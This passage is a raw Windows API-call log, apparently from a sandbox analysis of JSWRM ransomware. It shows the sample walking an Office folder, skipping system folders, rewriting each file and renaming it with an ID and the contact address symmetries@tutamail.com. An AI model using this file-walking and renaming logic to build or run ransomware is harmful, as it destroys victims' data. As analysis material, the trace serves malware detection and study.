(HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0113.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.CSS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.CSS", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GANTT.CSS", lpUsedDefaultChar=0x0) returned 9 [0113.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0113.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0113.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.CSS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.CSS", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GANTT.CSS", lpUsedDefaultChar=0x0) returned 9 [0113.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0113.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0113.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0113.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0113.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GANTT.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gantt.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.946] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0113.946] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0113.946] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0113.959] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.959] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0113.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0113.959] CloseHandle (hObject=0x238) returned 1 [0113.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0113.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0113.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0113.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0113.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0113.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0113.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0113.960] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GANTT.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gantt.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GANTT.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gantt.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0113.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0113.961] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x463f990, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x463f990, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x463f990, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x7fb, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GANTT.VRD", cAlternateFileName="")) returned 1 [0113.961] lstrcmpiW (lpString1="GANTT.VRD", lpString2=".") returned 1 [0113.961] lstrcmpiW (lpString1="GANTT.VRD", lpString2="..") returned 1 [0113.961] lstrcmpiW (lpString1="GANTT.VRD", lpString2="...") returned 1 [0113.961] lstrcmpiW (lpString1="GANTT.VRD", lpString2="windows") returned -1 [0113.961] lstrcmpiW (lpString1="GANTT.VRD", lpString2="recovery") returned -1 [0113.961] lstrcmpiW (lpString1="GANTT.VRD", lpString2="perflogs") returned -1 [0113.961] lstrcmpiW (lpString1="GANTT.VRD", lpString2="documents and settings") returned 1 [0113.961] lstrcmpiW (lpString1="GANTT.VRD", lpString2="$RECYCLE.BIN") returned 1 [0113.961] lstrcmpiW (lpString1="GANTT.VRD", lpString2="system volume information") returned -1 [0113.961] lstrcmpiW (lpString1="GANTT.VRD", lpString2="msocache") returned -1 [0113.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0113.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.VRD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.VRD", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GANTT.VRD", lpUsedDefaultChar=0x0) returned 9 [0113.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0113.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0113.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.VRD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.VRD", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GANTT.VRD", lpUsedDefaultChar=0x0) returned 9 [0113.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0113.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0113.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0113.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0113.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GANTT.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gantt.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.962] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2043) returned 1 [0113.962] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7f0) returned 0x20c6c0 [0113.962] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7f0, lpOverlapped=0x0) returned 1 [0113.964] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.964] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7f0, lpOverlapped=0x0) returned 1 [0113.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0113.964] CloseHandle (hObject=0x238) returned 1 [0113.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0113.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0113.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0113.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0113.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0113.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.965] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GANTT.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gantt.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GANTT.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gantt.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0113.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0113.965] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x31af525, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x31af525, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x463f990, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x50a50, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GANTT.VSL", cAlternateFileName="")) returned 1 [0113.965] lstrcmpiW (lpString1="GANTT.VSL", lpString2=".") returned 1 [0113.966] lstrcmpiW (lpString1="GANTT.VSL", lpString2="..") returned 1 [0113.966] lstrcmpiW (lpString1="GANTT.VSL", lpString2="...") returned 1 [0113.966] lstrcmpiW (lpString1="GANTT.VSL", lpString2="windows") returned -1 [0113.966] lstrcmpiW (lpString1="GANTT.VSL", lpString2="recovery") returned -1 [0113.966] lstrcmpiW (lpString1="GANTT.VSL", lpString2="perflogs") returned -1 [0113.966] lstrcmpiW (lpString1="GANTT.VSL", lpString2="documents and settings") returned 1 [0113.966] lstrcmpiW (lpString1="GANTT.VSL", lpString2="$RECYCLE.BIN") returned 1 [0113.966] lstrcmpiW (lpString1="GANTT.VSL", lpString2="system volume information") returned -1 [0113.966] lstrcmpiW (lpString1="GANTT.VSL", lpString2="msocache") returned -1 [0113.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0113.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.VSL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.VSL", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GANTT.VSL", lpUsedDefaultChar=0x0) returned 9 [0113.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0113.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0113.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.VSL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.VSL", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GANTT.VSL", lpUsedDefaultChar=0x0) returned 9 [0113.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0113.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0113.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0113.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0113.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GANTT.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gantt.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.967] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=330320) returned 1 [0113.967] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.968] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.982] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.982] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.982] CloseHandle (hObject=0x238) returned 1 [0113.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0113.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0113.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0113.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0113.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0113.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.983] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GANTT.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gantt.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GANTT.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gantt.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0113.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0113.984] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a05f3c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a05f3c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9a2c10c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2da00, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GR8GALRY.GRA", cAlternateFileName="")) returned 1 [0113.984] lstrcmpiW (lpString1="GR8GALRY.GRA", lpString2=".") returned 1 [0113.984] lstrcmpiW (lpString1="GR8GALRY.GRA", lpString2="..") returned 1 [0113.984] lstrcmpiW (lpString1="GR8GALRY.GRA", lpString2="...") returned 1 [0113.984] lstrcmpiW (lpString1="GR8GALRY.GRA", lpString2="windows") returned -1 [0113.984] lstrcmpiW (lpString1="GR8GALRY.GRA", lpString2="recovery") returned -1 [0113.984] lstrcmpiW (lpString1="GR8GALRY.GRA", lpString2="perflogs") returned -1 [0113.984] lstrcmpiW (lpString1="GR8GALRY.GRA", lpString2="documents and settings") returned 1 [0113.984] lstrcmpiW (lpString1="GR8GALRY.GRA", lpString2="$RECYCLE.BIN") returned 1 [0113.984] lstrcmpiW (lpString1="GR8GALRY.GRA", lpString2="system volume information") returned -1 [0113.984] lstrcmpiW (lpString1="GR8GALRY.GRA", lpString2="msocache") returned -1 [0113.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0113.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GR8GALRY.GRA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GR8GALRY.GRA", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GR8GALRY.GRA", lpUsedDefaultChar=0x0) returned 12 [0113.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0113.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0113.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GR8GALRY.GRA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GR8GALRY.GRA", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GR8GALRY.GRA", lpUsedDefaultChar=0x0) returned 12 [0113.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0113.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0113.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0113.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.985] 